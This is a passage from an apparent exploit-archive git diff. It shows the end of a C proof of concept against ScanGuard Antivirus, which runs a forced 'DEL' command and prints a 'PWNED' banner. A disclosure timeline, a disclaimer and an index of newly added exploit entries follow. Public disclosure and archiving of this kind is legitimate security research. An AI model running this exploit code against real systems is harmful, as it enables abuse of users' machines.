exit(0);
|
||||
}else{
|
||||
if(FileExists("ScamGuard.lnk")){
|
||||
system("DEL /f ScamGuard.lnk");
|
||||
}
|
||||
printf("[+] ScamGuard PWNED!!!");
|
||||
printf("[+] By hyp3rlinx\n");
|
||||
system("pause");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Vendor Notification: September 16, 2019
|
||||
Received vendor acknowledgement: September 16, 2019
|
||||
Second contact follow up: September 29, 2019
|
||||
No more vendor replies.
|
||||
November 12, 2019 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
|
@ -10770,6 +10770,7 @@ id,file,description,date,author,type,platform,port
|
|||
47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
|
||||
47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
|
||||
47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
|
||||
47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -41964,3 +41965,9 @@ id,file,description,date,author,type,platform,port
|
|||
47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
|
||||
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
|
||||
47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,
|
||||
47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,
|
||||
47650,exploits/php/webapps/47650.txt,"FUDForum 3.0.9 - Remote Code Execution",2019-11-13,liquidsky,webapps,php,
|
||||
47651,exploits/hardware/webapps/47651.txt,"Technicolor TD5130.2 - Remote Command Execution",2019-11-13,"João Teles",webapps,hardware,
|
||||
47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware,
|
||||
47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
|
||||
47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue